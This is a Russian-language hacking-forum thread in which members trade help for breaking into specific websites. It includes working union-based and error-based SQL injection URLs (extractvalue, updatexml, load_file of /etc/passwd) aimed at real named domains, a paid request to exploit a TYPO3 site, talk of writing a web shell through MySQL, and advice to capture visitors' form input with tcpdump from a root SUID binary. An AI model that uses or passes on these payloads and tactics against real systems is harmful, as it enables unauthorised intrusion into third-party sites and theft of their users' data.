Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. mazaxaka

    mazaxaka Elder - Старейшина

    Joined:
    15 Feb 2008
    Messages:
    310
    Likes Received:
    35
    Reputations:
    0
    нет. таже ошибка, перепробовал уже все пути. читается все, файл прив Y ,доступ рут, но не куда записать не могу, пути раскрыл .. не пойму что за беда такая
     
  2. gromoza

    gromoza Member

    Joined:
    21 Dec 2008
    Messages:
    7
    Likes Received:
    6
    Reputations:
    0
    Скорее всего при конфигурации не задана tmp директория. Ничего не поделать.
     
  3. mazaxaka

    mazaxaka Elder - Старейшина

    Joined:
    15 Feb 2008
    Messages:
    310
    Likes Received:
    35
    Reputations:
    0
    я наверное чегото не понимаю, а причем тут tmp , когда я пробую литься в другие дериктории
     
  4. gromoza

    gromoza Member

    Joined:
    21 Dec 2008
    Messages:
    7
    Likes Received:
    6
    Reputations:
    0
    http://www.cyberciti.biz/faq/mysqld-innodb-error-unable-to-create-temporary-file/
    Файлы же льются не прямо в директорию(host ->dir), а host -> tmp ->dir.
     
  5. 5maks5

    5maks5 Elder - Старейшина

    Joined:
    29 Aug 2010
    Messages:
    465
    Likes Received:
    261
    Reputations:
    40
    Если доступ есть на чтение файлов и к базе, то может лучше ковырять в сторону админской учетки форума\сайта? :)
     
    1 person likes this.
  6. mazaxaka

    mazaxaka Elder - Старейшина

    Joined:
    15 Feb 2008
    Messages:
    310
    Likes Received:
    35
    Reputations:
    0
    писал выше. админка заблочена на ип... в том то и проблема
     
  7. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,670
    Likes Received:
    891
    Reputations:
    363
    покажите файл /wp-admin/.htaccess
    папки в /wp-content/ все попробовали? соседей искали? что за ОС на сервере? что в файле wp-config.php написано? httpd.conf посмотрели?
     
    _________________________
  8. blacksuccess

    blacksuccess New Member

    Joined:
    12 Jan 2012
    Messages:
    0
    Likes Received:
    2
    Reputations:
    0
    На сайте имеется скрипт, в котором не фильтруется $_POST.

    Такой код:
    if (isset($_POST["name"]))
    {
    echo $_POST["name"];
    exit();
    }

    Можно ли через это залить шелл?
     
  9. YaBtr

    YaBtr Members of Antichat

    Joined:
    30 May 2012
    Messages:
    601
    Likes Received:
    350
    Reputations:
    652
    Вероятно, например, если вы поднимете свои права в системе с помощью XSS, а затем появится возможность выполнять произвольный код.
    Вообще, http://php.net/manual/ru/function.echo.php
     
    1 person likes this.
  10. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    2,615
    Likes Received:
    397
    Reputations:
    230
    Кто поможет раскрутить, дам 4 wmz, оч надо)
    http://www.kunst-forum.ch/suchresultate/?tx_artbase%5Baction%5D=performSearch&tx_artbase%5Bcontroller%5D=Search&cHash=d57aa66360d76c68d7dc4a736c29512a&tx_artbase%5Bsearchfield%5D=Craig
    ЗЫ интересные символы, когда ошибка появляется и пропадает "?" "Э"
     
  11. izzy

    izzy New Member

    Joined:
    23 Sep 2010
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    5.0.95-log
    http://www.site.com/index2.php?id=5+and+1=0+union+select+1,2,3,4,5,6,7,8,9,10,user(),12,13,14,15,16,17+--+
    snowsoc@server
    а теперь хочу узнать привилегии юзера
    и тут завис
    так http://www.site.com/index2.php?id=5+and+1=0+union+select+1,2,3,4,5,6,7,8,9,10,file_priv,12,13,14,15,16,17+from+mysql.user+where+user='snowsoc'+--+
    ошибка Error 1064 : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'snowsoc\' --' at line 1
    использую hex http://www.site.com/index2.php?id=5+and+1=0+union+select+1,2,3,4,5,6,7,8,9,10,file_priv,12,13,14,15,16,17+from+mysql.user+where+user=0x736e6f77736f63
    ошибка Error 1142 : SELECT command denied to user 'snowsoc'@'server' for table 'user'
    что эта ошибка значит?

    проверяю через LOAD_FILE('/etc/passwd')
    http://www.site.com/index2.php?id=5+and+1=0+union+select+1,2,3,4,5,6,7,8,9,10,load_file%280x2f6574632f706173737764%29,12,13,14,15,16,17--+
    выводит страницу сайта и число 10
    это значить что привилегии у пользователя есть?
     
  12. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,670
    Likes Received:
    891
    Reputations:
    363
    если бы были привилегии, вы бы получили в ответе файл /etc/passwd
    ошибка значит, что вы не можете сделать запрос к этой бд, потому что ее нет.
    ознакомтесь со статьей https://forum.antichat.ru/threadnav43966-1-10.html и прежде чем задавать вопрос поищите решение в гугле или поиском по форуму, на этот вопрос отвечали и не раз
     
    _________________________
    #23872 yarbabin, 11 Feb 2015
    Last edited: 11 Feb 2015
  13. YaBtr

    YaBtr Members of Antichat

    Joined:
    30 May 2012
    Messages:
    601
    Likes Received:
    350
    Reputations:
    652
    Причем здесь деньги? "вопросы по уязвимостям".
    У вас там CMS TYPO3, посмотрите публик сплоенты.
     
  14. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    2,615
    Likes Received:
    397
    Reputations:
    230
    Это вознагрождение)
    то что там типо3 я и так знаю
     
  15. MaxFast

    MaxFast Elder - Старейшина

    Joined:
    12 Oct 2011
    Messages:
    580
    Likes Received:
    148
    Reputations:
    94
    Мне вот интересно, а как крутится эта инъекция:
    Code:
    comingoutspb.com/ru/materialyi-po-proektu?project=[inj]
     
  16. YaBtr

    YaBtr Members of Antichat

    Joined:
    30 May 2012
    Messages:
    601
    Likes Received:
    350
    Reputations:
    652
    error-based, например через updatexml

    XPATH syntax error: ':5.5.41-0+wheezy1'
     
    1 person likes this.
  17. Aniweste

    Aniweste Member

    Joined:
    28 May 2010
    Messages:
    67
    Likes Received:
    9
    Reputations:
    1
    Есть рутовый суидник на сайте site.com
    Интересует вопрос: как снифить данные с info.php и сохранять их в отдельный файл? Вставить снифер в код - не вариант. Поправить код - тоже. Весь код закодирован.
    Поясню:
    Пользователь вводит данные на site.com/info.php - как получить эти данные, (данные которые он ввёл на этой странице), имея рутовый суидник, но исключая вариант с изменением/дополнением файла info.php - не вариант.
     
  18. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,255
    Likes Received:
    1,147
    Reputations:
    886
    tcpdump
     
    _________________________
    1 person likes this.
  19. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    2,615
    Likes Received:
    397
    Reputations:
    230
    http://www.uwm.edu.pl/pa/index.php?id=30&FE%5Btt_address%5D%5Bemail%5D=6l7fdfdea@mail.com&FE%5Btt_address%5D%5Bname%5D=a'&FE%5Btt_address%5D%5Bmodule_sys_dmail_category%5D=3&FE%5Btt_address%5D%5Bmodule_sys_dmail_html%5D=1
    Чет вроде скуля не сложная, но немогу раскрутить...
    ЗЫ при правильном вводе, ошибка пропадает, далее меняете 6l7fdfdea@mail.com на другое мыло
     
  20. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,670
    Likes Received:
    891
    Reputations:
    363
    Code:
    http://www.uwm.edu.pl/pa/index.php?id=30&FE%5Btt_address%5D%5Bemail%5D=6l7fdfdea44544@mail.com&FE%5Btt_address%5D%5Bname%5D=lol%27and%28extractvalue%281,concat%280x5c,version%28%29%29%29%29=%271&FE%5Btt_address%5D%5Bmodule_sys_dmail_category%5D=%203&FE%5Btt_address%5D%5Bmodule_sys_dmail_html%5D=1
    XPATH syntax error: '\5.5.38-log'
     
    _________________________
    1 person likes this.
Loading...
Thread Status:
Not open for further replies.